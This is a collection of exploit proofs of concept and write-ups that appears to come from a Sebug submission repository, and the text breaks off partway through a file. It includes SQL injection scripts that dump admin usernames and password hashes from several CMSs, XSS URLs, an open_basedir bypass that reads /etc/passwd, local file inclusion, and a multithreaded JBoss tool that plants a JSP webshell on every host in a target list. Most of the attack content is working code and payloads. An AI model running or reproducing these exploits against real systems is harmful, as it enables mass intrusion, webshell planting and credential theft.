├── Cscms V4.0.1 app:controllers:api:count.php SQL注入 ├── README.md └── poc.py ├── ESPCMS adminsoft:control:citylist.php SQL注入 ├── README.md └── poc.py ├── FlatPress Cross Site Scripting Vulnerability └── README.md ├── JBoss综合利用 └── Jboss.py ├── PHP 5.2.11:5.3.0 - Multiple Vulnerabilities └── README.md ├── README.md ├── TCCMS V9 app:controller:news.class.php中all函数导致SQL注入 ├── README.md └── poc.py ├── TCCMS V9.0 本地文件包含 ├── README.md └── poc.py ├── WikkaWiki 1.3.2 Spam Logging PHP Injection └── README.md ├── WikkaWiki <= 1.3.2 - Multiple Security Vulnerabilities └── README.md ├── Zabbix弱口令 └── Zabbix.py ├── censys_query.py ├── eYou老版本Cookie命令执行 ├── README.md └── eYouExp.php ├── phpoa4.0 任意文件上传 └── README.md ├── phpshe1.4 sql injection ├── README.md └── poc.py └── 新中新校园卡任意文件上传 ├── README.md └── poc.php /Cscms V4.0.1 app:controllers:api:count.php SQL注入/README.md: -------------------------------------------------------------------------------- 1 | # Cscms V4.0.1在app/controllers/api/count.php中param参数sql注入 2 | --- 3 | ### 1. 漏洞成因 4 | 5 | 在/app/controllers/api/count.php中对param参数过滤不严 6 | 7 | 首先来看这段代码 8 | 9 | ``` 10 | function __construct(){ 11 | parent::__construct(); 12 | $this->load->library('user_agent'); 13 | if(!$this->agent->is_referral()) show_error('您访问的页面不存在~!',404,Web_Name.'提醒您'); 14 | //关闭数据库缓存 15 | $this->db->cache_off(); 16 | } 17 | ``` 18 | 必须要对Referer头进行定义才能访问到该页面 19 | 20 | 下面是关键代码 21 | 22 | ``` 23 | public function index() 24 | { 25 | $count=0; 26 | $param=$this->input->get('param',true,true); 27 | if(!empty($param)){ 28 | $str=explode('|', $param); 29 | $table=$str[0]; 30 | if(!empty($table) && $this->db->table_exists(CS_SqlPrefix.$table)){ 31 | $sql=""; 32 | for($j=1;$j".$times." "; 40 | }else{ 41 | if(!empty($v[1])){ 42 | $sql.="and ".$v[0]."='".$v[1]."' "; 43 | }else{ 44 | $sql.="and ".$str[$j]." "; 45 | } 46 | } 47 | } 48 | if(substr($sql,0,3)=='and') $sql=substr($sql,3); 49 | if(!empty($sql)) $sql=" where".$sql; 50 | $sql="select id from `".CS_SqlPrefix.$table."` ".$sql; 51 | $count=$this->db->query($sql)->num_rows(); 52 | } 53 | } 54 | echo 'document.writeln("'.$count.'")'; 55 | } 56 | ``` 57 | 58 | 在上面这段代码中可以看到$param由get参数获得,并对此参数进行了一定的过滤操作,输入的空格会被删除 59 | 60 | $str由$param以 | 来进行切分获得,$table为$str第一个元素并作为数据库将要查询的表的名字 61 | 62 | 通过上面的代码我们可以知道,如果$str元素个数只有2个,$v[0]!='times'并且$v[1]为空的时候,$str第二个参数会被直接拼接到$sql的后面 63 | 64 | 可以构造出以下 65 | 66 | ``` 67 | ?param=admin|(select/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(select/**/concat(char(45,45),adminname,char(45,45,45),adminpass,char(45,45))/**/from/**/v4_admin/**/limit/**/1))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a) 68 | ``` 69 | 其中admin作为$table的值,| 后面则是另外一个查询 70 | 71 | 数据库最终执行的语句为: 72 | 73 | ![](http://images.sebug.net/contribute/807cca55-901e-4453-b6b6-23dd5e9b96de-1.png) 74 | 75 | ### 2. 漏洞验证 76 | ![](http://images.sebug.net/contribute/f1631dab-7ec0-456c-a344-5519ca57a5bf-3.png) 77 | 78 | ### 3. 漏洞影响版本 79 | Cscms V4.0.1 且在2015-05-13补丁前的版本 80 | 81 | ### 4. 漏洞防护方案 82 | 升级到最新版 83 | 84 | 官方补丁对$param参数进行了更严格的过滤: 85 | 86 | ``` 87 | if(!preg_match("/^[a-zA-Z0-9_\|\=\-]+$/", $param)){ 88 | $param=''; 89 | } 90 | ``` -------------------------------------------------------------------------------- /Cscms V4.0.1 app:controllers:api:count.php SQL注入/poc.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # coding: utf-8 3 | from pocsuite.net import req 4 | from pocsuite.poc import POCBase, Output 5 | from pocsuite.utils import register 6 | import urlparse 7 | import re 8 | 9 | class TestPOC(POCBase): 10 | vulID = '' # ssvid 11 | version = '1.0' 12 | author = ['Gump'] 13 | vulDate = '2015-08-11' 14 | createDate = '2016-01-15' 15 | updateDate = '2016-01-15' 16 | references = ['http://www.wooyun.org/bugs/wooyun-2015-0113520'] 17 | name = 'CSCMS V4.0.1 app/controllers/api/count.php SQL注入 POC' 18 | appPowerLink = 'http://www.chshcms.com/' 19 | appName = 'CSCMS' 20 | appVersion = '4.0.1' 21 | vulType = 'SQL Injection' 22 | desc = ''' 23 | CSCMS在拼接sql语句的时候过滤不严,把param参数直接拼接到sql语句中导致sql注入,可以获得管理员账户和加密后的密码 24 | ''' 25 | 26 | # 组件安装包下载地址:https://github.com/chshcms/CSCMS-v4.0-UTF8 27 | samples = [''] 28 | 29 | def _attack(self): 30 | result = {} 31 | payload = "?param=admin|(select/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(select/**/concat(char(45,45),adminname,char(45,45,45),adminpass,char(45,45))/**/from/**/v4_admin/**/limit/**/1))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)" 32 | vulurl = urlparse.urljoin(self.url,'index.php/api/count/index' + payload) 33 | head = { 34 | 'Referer':'http://www.baidu.com' 35 | } 36 | resp = req.get(vulurl,headers=head) 37 | # 返回的是500状态码而不是一般的200 38 | if resp.status_code == 500: 39 | match_result = re.search(r'Duplicate entry \'1--(.+)---(.+)--\' for key',resp.content,re.I | re.M) 40 | if match_result: 41 | result['AdminInfo'] = {} 42 | result['AdminInfo']['Username'] = match_result.group(1) 43 | result['AdminInfo']['Password'] = match_result.group(2) 44 | return self.parse_output(result) 45 | 46 | def _verify(self): 47 | result = {} 48 | payload = "?param=admin|(select/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),md5(1))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)" 49 | vulurl = urlparse.urljoin(self.url,'index.php/api/count/index' + payload) 50 | head = { 51 | 'Referer':'http://www.baidu.com' 52 | } 53 | resp = req.get(vulurl,headers=head) 54 | # 返回的是500状态码而不是一般的200 55 | if resp.status_code == 500 and 'c4ca4238a0b923820dcc509a6f75849b' in resp.content: 56 | result['VerifyInfo'] = {} 57 | result['VerifyInfo']['URL'] = urlparse.urljoin(self.url,'index.php/api/count/index') 58 | result['VerifyInfo']['Payload'] = payload 59 | return self.parse_output(result) 60 | 61 | def parse_output(self, result): 62 | #parse output 63 | output = Output(self) 64 | if result: 65 | output.success(result) 66 | else: 67 | output.fail('Internet nothing returned') 68 | return output 69 | 70 | 71 | register(TestPOC) -------------------------------------------------------------------------------- /ESPCMS adminsoft:control:citylist.php SQL注入/README.md: -------------------------------------------------------------------------------- 1 | # ESPCMS在adminsoft\control\citylist.php SQL注入 2 | --- 3 | 暂无详情,请看POC -------------------------------------------------------------------------------- /ESPCMS adminsoft:control:citylist.php SQL注入/poc.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # coding: utf-8 3 | from pocsuite.net import req 4 | from pocsuite.poc import POCBase, Output 5 | from pocsuite.utils import register 6 | import re 7 | import urlparse 8 | 9 | class TestPOC(POCBase): 10 | vulID = '' # ssvid 11 | version = '1.0' 12 | author = ['Gump'] 13 | vulDate = '2015-12-27' 14 | createDate = '2016-01-29' 15 | updateDate = '2016-01-29' 16 | references = ['http://www.wooyun.org/bugs/wooyun-2015-0163605'] 17 | name = 'ESPCMS V6.6.15.12.09 adminsoft\control\citylist.php SQL注入 POC' 18 | appPowerLink = 'http://www.ecisp.cn/' 19 | appName = 'ESPCMS' 20 | appVersion = 'V6.6.15.12.09' 21 | vulType = 'SQL Injection' 22 | desc = ''' 23 | ESPCMS V6.6.15.12.09在adminsoft\control\citylist.php对参数处理不当导致SQL注入,需要后台其他管理员权限登录 24 | ''' 25 | samples = [''] 26 | # 组件下载地址http://www.ecisp.cn/html/cn/download/ 27 | 28 | # 需要后台登录Cookie,可用其他普通管理员账户登录 29 | def check_argv(self): 30 | logger.log(CUSTOM_LOGGING.WARNING,u"注意,需要后台登录后的cookie") 31 | if self.headers['Cookie']: 32 | # 同时自动设置好User-Agent 33 | self.headers['User-agent'] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36" 34 | logger.log(CUSTOM_LOGGING.WARNING,u"请确保cookie正确") 35 | return True 36 | else: 37 | logger.log(CUSTOM_LOGGING.WARNING,u"请提交后台登录后的cookie") 38 | return False 39 | 40 | def _attack(self): 41 | if self.check_argv(): 42 | result = {} 43 | payload = "?archive=citylist&action=citylist&parentid=-1 UNION select 1,2,concat(char(45,45,45),name,char(45,45,45),password,char(45,45,45)),4,5 FROM espcms_v6.espcms_admin_member" 44 | vulurl = urlparse.urljoin(self.url,'adminsoft/index.php' + payload) 45 | resp = req.get(vulurl) 46 | if resp.status_code == 200: 47 | # 匹配账户密码 48 | match_result = re.search(r'---(.+)---(.+)---',resp.content,re.I | re.M) 49 | if match_result: 50 | result['AdminInfo'] = {} 51 | result['AdminInfo']['Username'] = match_result.group(1) 52 | result['AdminInfo']['Password'] = match_result.group(2) 53 | return self.parse_attack(result) 54 | 55 | def _verify(self): 56 | if self.check_argv(): 57 | result = {} 58 | payload = "?archive=citylist&action=citylist&parentid=-1 UNION select 1,2,concat(floor(rand(0)*2),md5(1)),4,5" 59 | vulurl = urlparse.urljoin(self.url,'adminsoft/index.php' + payload) 60 | resp = req.get(vulurl) 61 | if resp.status_code == 200 and 'c4ca4238a0b923820dcc509a6f75849b' in resp.content: 62 | result['VerifyInfo'] = {} 63 | result['VerifyInfo']['URL'] = urlparse.urljoin(self.url,'adminsoft/index.php') 64 | result['VerifyInfo']['Payload'] = payload 65 | return self.parse_attack(result) 66 | 67 | def parse_output(self, result): 68 | #parse output 69 | output = Output(self) 70 | if result: 71 | output.success(result) 72 | else: 73 | output.fail('Internet nothing returned') 74 | return output 75 | 76 | 77 | register(TestPOC) -------------------------------------------------------------------------------- /FlatPress Cross Site Scripting Vulnerability/README.md: -------------------------------------------------------------------------------- 1 | # FlatPress Cross Site Scripting Vulnerability 2 | --- 3 | #### 1. 漏洞成因 4 | 5 | 在contact.php、login.php、search.php页面中对输入的转义处理不恰当 6 | 7 | #### 2.漏洞验证 8 | 9 | ``` 10 | http://server/flatpress/contact.php/>"> 11 | ``` 12 | ``` 13 | http://server/flatpress/login.php/>"> 14 | ``` 15 | ``` 16 | http://server/flatpress/search.php/>"> 17 | ``` -------------------------------------------------------------------------------- /JBoss综合利用/Jboss.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | 4 | # jmx-console和JMXInvokerServlet verify 5 | 6 | import requests 7 | import commands 8 | import sys 9 | import urllib2 10 | from Queue import Queue 11 | import threading 12 | 13 | url_queue = Queue() 14 | jmx_console_vul_queue = Queue() 15 | jmx_invoker_servlet_vul_queue = Queue() 16 | THREAD_NUM = 20 17 | vul_url_txt = open("target.txt","w") 18 | 19 | class Jboss: 20 | def __init__(self): 21 | self.file_name = "t2stj60ss" 22 | self.headers = { 23 | "User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36" 24 | } 25 | 26 | def set_url(self,url): 27 | self.url = url 28 | 29 | def output(self,msg): 30 | print msg 31 | exit(0) 32 | 33 | def jmxconsole(self): 34 | # print "Checking jmx console" 35 | shell_content = "%3c%25if(request%2egetParameter(%22f%22)!%3dnull)(new+java%2eio%2eFileOutputStream(application%2egetRealPath(%22%2f%22)%2brequest%2egetParameter(%22f%22)))%2ewrite(request%2egetParameter(%22t%22)%2egetBytes())%3b%25%3ec4ca4238a0b923820dcc509a6f75849b" 36 | payload = payload = "?action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=" + self.file_name + ".war&argType=java.lang.String&arg1=" + self.file_name + "&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=" + shell_content + "&argType=boolean&arg4=True" 37 | vul_url = self.url + '/jmx-console/HtmlAdaptor' + payload 38 | # print vul_url 39 | try: 40 | rep = requests.get(vul_url,headers = self.headers,timeout = 5) 41 | payload_code = rep.status_code 42 | if rep.status_code == 200: 43 | return True 44 | elif rep.status_code == 401: 45 | return self.bypass_auth() 46 | except Exception,e: 47 | # print e 48 | pass 49 | return False 50 | return False 51 | 52 | def jmxInvokerServlet(self): 53 | vul_url = self.url + "/invoker/JMXInvokerServlet" 54 | try: 55 | rep = requests.get(vul_url,headers = self.headers,timeout=5) 56 | if rep.status_code == 200: 57 | 58 | return True 59 | res = commands.getoutput("java -jar jboss_exploit_fat.jar -i " + vul_url + " invoke jboss.admin:service=DeploymentFileRepository store " + self.file_name + ".war " + self.file_name + " .jsp $content$ true -s java.lang.String;java.lang.String;java.lang.String;java.lang.String;java.lang.Boolean",shell=True) 60 | if res.find('jboss') < 0 and res.find('Exception') < 0 and res.find('exception') < 0 and res.find('Failed') < 0 and res.find('Mismatch') < 0 and res.find('not found') < 0: 61 | print res 62 | return True 63 | else: 64 | print res 65 | return False 66 | except Exception, e: 67 | pass 68 | return False 69 | return False 70 | 71 | def bypass_auth(self): 72 | shell_content = "%3c%25if(request%2egetParameter(%22f%22)!%3dnull)(new+java%2eio%2eFileOutputStream(application%2egetRealPath(%22%2f%22)%2brequest%2egetParameter(%22f%22)))%2ewrite(request%2egetParameter(%22t%22)%2egetBytes())%3b%25%3ec4ca4238a0b923820dcc509a6f75849b" 73 | payload = payload = "?action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=" + self.file_name + ".war&argType=java.lang.String&arg1=" + self.file_name + "&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=" + shell_content + "&argType=boolean&arg4=True" 74 | vul_url = self.url + '/jmx-console/HtmlAdaptor' + payload 75 | try: 76 | opener = urllib2.build_opener(urllib2.HTTPHandler) 77 | request = urllib2.Request(vul_url) 78 | request.add_header("User-Agent","Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36") 79 | request.get_method = lambda: 'HEAD' 80 | opener.open(request,timeout = 5) 81 | if request.status == 200: 82 | return True 83 | except Exception,e: 84 | pass 85 | return False 86 | return False 87 | 88 | class testTarget(threading.Thread): 89 | def __init__(self): 90 | threading.Thread.__init__(self) 91 | 92 | def run(self): 93 | global url_queue 94 | global THREAD_NUM 95 | jboss = Jboss() 96 | while not url_queue.empty(): 97 | ip = url_queue.get() 98 | print "Checking http://" + ip + "/" 99 | jboss.set_url("http://" + ip + "/") 100 | if jboss.jmxconsole(): 101 | print ip + " is vulnerable (JmxConsole)" 102 | jmx_console_vul_queue.put(ip) 103 | elif jboss.jmxInvokerServlet(): 104 | print ip + " found (JmxInvokerServlet)" 105 | jmx_invoker_servlet_vul_queue.put(ip) 106 | 107 | def test(): 108 | threads = [] 109 | for i in range(THREAD_NUM): 110 | t = testTarget() 111 | t.start() 112 | threads.append(t) 113 | for t in threads: 114 | t.join() 115 | 116 | if __name__ == '__main__': 117 | ip_txt = open("vul_ip.txt","r") 118 | for line in ip_txt: 119 | url_queue.put(line.strip("\n")) 120 | ip_txt.close() 121 | test() 122 | 123 | vul_url_txt.write("JMX-console:\n") 124 | while not jmx_console_vul_queue.empty(): 125 | vul_url_txt.write(jmx_console_vul_queue.get() + "\n") 126 | 127 | vul_url_txt.write("Invoker Servlet:\n") 128 | while not jmx_invoker_servlet_vul_queue.empty(): 129 | vul_url_txt.write(jmx_invoker_servlet_vul_queue.get() + "\n") 130 | 131 | vul_url_txt.close() -------------------------------------------------------------------------------- /PHP 5.2.11:5.3.0 - Multiple Vulnerabilities/README.md: -------------------------------------------------------------------------------- 1 | ### PHP 5.2.11/5.3.0 - Multiple Vulnerabilities 2 | --- 3 | symlink()函数在php中用于创建符号连接,函数原型如下: 4 | 5 | ``` 6 | bool symlink ( string $target , string $link ) 7 | ``` 8 | 9 | 其中$target和$link参数会受到open_basedir的限制,但是可以通过以下的方法来进行绕过。 10 | 11 | 首先来看被限制的情况 12 | 13 | ``` 14 | 18 | ``` 19 | 20 | 执行php sym.php返回如下 21 | 22 | ``` 23 | PHP Warning: symlink(): open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/www) in /www/test/sym.php on line 2 24 | 25 | Warning: symlink(): open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/www) in /www/test/sym.php on line 2 26 | ``` 27 | open_basedir会禁止连接到/etc/passwd 28 | 29 | 但是可以试着构造以下的情况, 30 | 31 | 来看下当前目录情况 32 | 33 | ``` 34 | 127# ls -la 35 | total 8 36 | drwxr-xr-x 2 www www 512 Oct 20 00:33 . 37 | drwxr-xr-x 13 www www 1536 Oct 20 00:26 .. 38 | - -rw-r--r-- 1 www www 356 Oct 20 00:32 kakao.php 39 | - -rw-r--r-- 1 www www 45 Oct 20 00:26 sym.php 40 | 127# pwd 41 | /www/test 42 | ``` 43 | 44 | 其中kakao.php代码如下: 45 | 46 | ``` 47 | 69 | ``` 70 | 71 | 这个时候对于symlink来说参数都是合法的。 72 | 73 | 执行php kakao.php,再查看当前目录 74 | 75 | ``` 76 | 127# php kakao.php 77 | 127# ls -la 78 | total 12 79 | drwxr-xr-x 4 www www 512 Oct 20 00:37 . 80 | drwxr-xr-x 13 www www 1536 Oct 20 00:26 .. 81 | drwxr-xr-x 4 www www 512 Oct 20 00:37 abc 82 | lrwxr-xr-x 1 www www 27 Oct 20 00:37 exploit -> tmplink/../../../etc/passwd 83 | - -rw-r--r-- 1 www www 356 Oct 20 00:32 kakao.php 84 | - -rw-r--r-- 1 www www 45 Oct 20 00:26 sym.php 85 | drwxr-xr-x 2 www www 512 Oct 20 00:37 tmplink 86 | ``` 87 | 88 | 这个时候再来看下exploit文件中的内容 89 | 90 | ``` 91 | 127# cat exploit 92 | root:*:0:0:god:/root:/bin/csh 93 | ... 94 | ... 95 | ``` 96 | 97 | 已经成功把/etc/passwd中的内容显示出来了 98 | 99 | 现在的tmplink是个文件夹,所以链接"exploit"变成了"../../etc/passwd",成功绕开了symlink()中open_basedir对参数的检查。 -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Sebug 2 | --- 3 | 包含了Sebug上提交通过或因重复而未通过的漏洞详情或POC 4 | 5 | 还包含少许批量脚本 6 | 7 | --- 8 | ## List 9 | 1. PHP 5.2.11/5.3.0 - Multiple Vulnerabilities 10 | 2. ESPCMS adminsoft/control/citylist.php SQL注入 11 | 3. Cscms V4.0.1 app/controllers/api/count.php SQL注入 12 | 4. phpoa4.0 任意文件上传 13 | 5. phpshe1.4 sql injection 14 | 6. TCCMS V9 app/controller/news.class.php中all函数导致SQL注入 15 | 7. TCCMS V9.0 本地文件包含 16 | 8. WikkaWiki <= 1.3.2 - Multiple Security Vulnerabilities 17 | 9. WikkaWiki 1.3.2 Spam Logging PHP Injection 18 | 10. 新中新校园卡任意文件上传 19 | 11. eYou老版本Cookie命令执行 20 | 12. FlatPress Cross Site Scripting Vulnerability 21 | 13. Zabbix弱口令批量检测 22 | 14. JBoss综合getshell批量检测 23 | 24 | --- 25 | ## Censys.io 26 | censys_query.py 可获取censys.io上的ip,用法 27 | 28 | python censys_query.py query_str -------------------------------------------------------------------------------- /TCCMS V9 app:controller:news.class.php中all函数导致SQL注入/README.md: -------------------------------------------------------------------------------- 1 | # TCCMS V9.0 app/controller/news.class.php all函数导致SQL注入 2 | --- 3 | ### 1. 漏洞成因 4 | 5 | 在app/controller/news.class.php中all函数对参数过滤不严 6 | 7 | ``` 8 | public function all() { 9 | $this->userIsLogin (); 10 | $_Obj = M($this->objName); 11 | $categoryObj = M("category"); 12 | $_Obj->pageSize = 20; 13 | $where = "1=1"; 14 | $key = StringUtil::GetSQLValueString($_POST['key']); 15 | $cid = intval($_GET['cid']); 16 | if ($key != "") { 17 | $where .= " and title like '$key%'"; 18 | } 19 | if (!empty($cid) && $cid != "") { 20 | $where .= " and classid = " . $cid; 21 | } 22 | if ($_GET["type"] == "user") { 23 | $where .= " and uid = " . $_COOKIE['userId']; 24 | } 25 | if (isset($_GET['yz'])) { 26 | $where .= " AND yz =".$_GET['yz']; 27 | } 28 | if (isset($_GET['levels'])) { 29 | $where .= " AND levels =".$_GET['levels']; 30 | } 31 | if (isset($_GET['special'])) { 32 | $where .= " AND special =".$_GET['special']; 33 | } 34 | if (isset($_GET['top'])) { 35 | $where .= " AND top =".$_GET['top']; 36 | } 37 | if (isset($_GET['flashpic'])) { 38 | $where .= " AND flashpic =".$_GET['flashpic']; 39 | } 40 | if (isset($_GET['isphoto'])) { 41 | $where .= " AND isphoto =".$_GET['isphoto']; 42 | } 43 | $_Obj->setSortId(); 44 | $orderBy = $_GET['sortId']; 45 | $_objAry = $_Obj->where($where)->orderby("id ".$orderBy)->getList(); 46 | $this->setValue("categoryObj", $categoryObj); 47 | $this->setValue("objAry", $_objAry); 48 | $this->setValue("Obj", $_Obj); 49 | $this->setValue("action", "list"); 50 | $this->forward("user/newsList.html"); 51 | } 52 | ``` 53 | 54 | 这里从get和cookie里获取了很多参数,都没有进行过滤,这里只拿其中的$cookie['userId']来进行测试,其他参数同理 55 | 56 | ### 2.漏洞验证 57 | poc: 58 | 59 | ``` 60 | union select concat(floor(rand(0)*2),md5(1)),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29# 61 | ``` 62 | ![](http://images.sebug.net/contribute/1f583546-ded2-4555-bf37-50ae08942b39-tccms2.png) 63 | 64 | ### 3. 影响版本 65 | 66 | TCCMS V9.0 67 | 68 | ### 4. 漏洞防护方案 69 | 70 | 升级版本 -------------------------------------------------------------------------------- /TCCMS V9 app:controller:news.class.php中all函数导致SQL注入/poc.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # coding: utf-8 3 | from pocsuite.net import req 4 | from pocsuite.poc import POCBase, Output 5 | from pocsuite.utils import register 6 | from pocsuite.lib.core.data import logger 7 | from pocsuite.lib.core.enums import CUSTOM_LOGGING 8 | import re 9 | import urlparse 10 | 11 | 12 | class TestPOC(POCBase): 13 | vulID = '' # ssvid 14 | version = '1.0' 15 | author = ['Gump'] 16 | vulDate = '2015-07-25' 17 | createDate = '2016-01-23' 18 | updateDate = '2016-01-23' 19 | references = ['http://www.wooyun.org/bugs/wooyun-2015-0107593'] 20 | name = 'TCCMS V9 app/controller/news.class.php SQL注入 POC' 21 | appPowerLink = 'http://www.teamcen.com/' 22 | appName = 'TCCMS' 23 | appVersion = '9.0' 24 | vulType = 'SQL Injection' 25 | desc = ''' 26 | TCCMS在拼接where语句的时候过滤不严,导致参数直接拼接到sql语句中产生注入,可以获得管理员账户和加密后的密码。这里用cookie里的参数来测试。 27 | ''' 28 | samples = [''] 29 | 30 | # 组件下载地址:http://down.chinaz.com/soft/33822.htm 31 | def check_argv(self): 32 | logger.log(CUSTOM_LOGGING.WARNING,u"注意,需要登录后的cookie,cookie例子:PHPSESSID=xxx; userId=1; AuthenId=xxx") 33 | if self.headers['Cookie']: 34 | if re.search('(userId=\d+)',self.headers['Cookie']): 35 | return True 36 | else: 37 | logger.log(CUSTOM_LOGGING.WARNING,u"输入的cookie不正确") 38 | return False 39 | else: 40 | logger.log(CUSTOM_LOGGING.WARNING,u"请提交登录后的cookie") 41 | return False 42 | 43 | def _attack(self): 44 | if self.check_argv(): 45 | result = {} 46 | payload = re.sub(r'(userId=\d+)','\\1'+' union select concat(char(45,45,45),username,char(45,45,45),password,char(45,45,45)),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 from tc_user limit 1#',self.headers['Cookie']) 47 | self.headers['Cookie'] = payload 48 | vul_url = urlparse.urljoin(self.url,'index.php?ac=news_all&showSql=1&type=user') 49 | resp = req.get(vul_url) 50 | if resp.status_code == 200: 51 | match_result = re.search(r'\(\'---(.+)---(.+)---\'\)',resp.content,re.I | re.M) 52 | if match_result: 53 | result['AdminInfo'] = {} 54 | result['AdminInfo']['Username'] = match_result.group(1) 55 | result['AdminInfo']['Password'] = match_result.group(2) 56 | return self.parse_attack(result) 57 | 58 | def _verify(self): 59 | if self.check_argv(): 60 | result = {} 61 | payload = re.sub(r'(userId=\d+)','\\1'+' union select concat(floor(rand(0)*2),md5(1)),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#',self.headers['Cookie']) 62 | self.headers['Cookie'] = payload 63 | vul_url = urlparse.urljoin(self.url,'index.php?ac=news_all&showSql=1&type=user') 64 | resp = req.get(vul_url) 65 | if resp.status_code == 200 and 'c4ca4238a0b923820dcc509a6f75849b' in resp.content: 66 | result['VerifyInfo'] = {} 67 | result['VerifyInfo']['URL'] = vul_url 68 | result['VerifyInfo']['Payload'] = payload 69 | return self.parse_attack(result) 70 | 71 | def parse_output(self, result): 72 | #parse output 73 | output = Output(self) 74 | if result: 75 | output.success(result) 76 | else: 77 | output.fail('Internet nothing returned') 78 | return output 79 | 80 | 81 | register(TestPOC) -------------------------------------------------------------------------------- /TCCMS V9.0 本地文件包含/README.md: -------------------------------------------------------------------------------- 1 | # TCCMS V9.0 本地文件包含 2 | --- 3 | ### 1. 漏洞成因 4 | 5 | 在system/core/controller.class.php中run函数对参数过滤不严 6 | 7 | ``` 8 | public function Run() { 9 | $this->Analysis(); 10 | $this->control = $_GET['c']; 11 | $this->action = $_GET['a']; 12 | if ($_GET['a'] === "list") { 13 | $this->action = "listAll"; 14 | } 15 | //子目录支持 16 | $dir = ''; 17 | if (isset($_GET['d'])) { 18 | $dir .= $_GET['d'].'/'; 19 | } 20 | $adminDir = '/controller/'; 21 | if (defined('IN_ADMIN')) { 22 | $adminDir = '/admin/'; 23 | } 24 | //子模块支持 25 | $module = strcmp(MODULE, "/") == 0 ? 'app' : MODULE; 26 | $controlFile = ROOT_PATH . '/' . $module . $adminDir . $dir.$this->control. '.class.php'; 27 | if (!file_exists($controlFile)) { 28 | $this->setValue("error",$this->control.Config::lang("CONTROLLERNOTEXISTS")); 29 | $this->forward("error.html"); 30 | exit; 31 | } 32 | include($controlFile); 33 | if (!class_exists($this->control)) { 34 | $this->setValue("error",$this->control.Config::lang("CONTROLLERNOTDEFINED")); 35 | $this->forward("error.html"); 36 | exit; 37 | } 38 | $instance = new $this->control(); 39 | if (!method_exists($instance, $this->action)) { 40 | $this->setValue("error", $this->action .Config::lang("METHODNOTFIND")); 41 | $this->forward("error.html"); 42 | exit; 43 | } 44 | $methodName = $this->action; 45 | $instance->$methodName(); 46 | } 47 | ``` 48 | 从GET中获取的d参数未进行过滤,结合在php5.3.4以下的版本的空字符截断可进行本地文件包含并获取shell,本地文件可在注册后进行图片上传得到 49 | 50 | ### 2. 漏洞验证 51 | 52 | poc: 53 | 54 | ``` 55 | http://xxx.com/index.php?d=../../uploadfiles/local_filename.jpg%00 56 | ``` 57 | ![](http://images.sebug.net/contribute/13f54833-39b0-421c-af0b-c874998bd7c4-tccms_upload.png) 58 | 59 | ### 3. 影响版本 60 | 61 | TCCMS V9.0 62 | 63 | ### 4. 防护方案 64 | 65 | 升级版本 -------------------------------------------------------------------------------- /TCCMS V9.0 本地文件包含/poc.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # coding: utf-8 3 | from pocsuite.net import req 4 | from pocsuite.poc import POCBase, Output 5 | from pocsuite.utils import register 6 | from pocsuite.lib.core.data import logger 7 | from pocsuite.lib.core.enums import CUSTOM_LOGGING 8 | import urlparse 9 | import re 10 | 11 | 12 | class TestPOC(POCBase): 13 | vulID = '' # ssvid 14 | version = '1.0' 15 | author = ['Gump'] 16 | vulDate = '2015-06-30' 17 | createDate = '2016-01-24' 18 | updateDate = '2016-01-24' 19 | references = ['http://www.wooyun.org/bugs/wooyun-2015-0104065'] 20 | name = 'TCCMS V9 本地文件包含 POC' 21 | appPowerLink = 'http://www.teamcen.com/' 22 | appName = 'TCCMS' 23 | appVersion = 'V9' 24 | vulType = 'Local File Inclusion' 25 | desc = ''' 26 | TCCMS在system/core/controller.class.php中对参数过滤不严导致本地文件包含 27 | ''' 28 | samples = [''] 29 | # 组件下载地址:http://down.chinaz.com/soft/33822.htm 30 | 31 | # 需要登录后的cookie 32 | def check_argv(self): 33 | logger.log(CUSTOM_LOGGING.WARNING,u"注意,需要登录后的cookie") 34 | if self.headers['Cookie']: 35 | logger.log(CUSTOM_LOGGING.WARNING,u"请务必确保cookie正确") 36 | return True 37 | else: 38 | logger.log(CUSTOM_LOGGING.WARNING,u"请提交登录后的cookie") 39 | return False 40 | 41 | 42 | def _attack(self): 43 | if self.check_argv(): 44 | result = {} 45 | 46 | self.headers['Content-Type'] = "multipart/form-data; boundary=----WebKitFormBoundaryMOKvckE0g6qr7jKz" 47 | post_data = "------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"files\"; filename=\"testjpg.jpg\"\r\nContent-Type: image/jpeg\r\n\r\n\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"submit\"\r\n\r\n\r\n \r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; 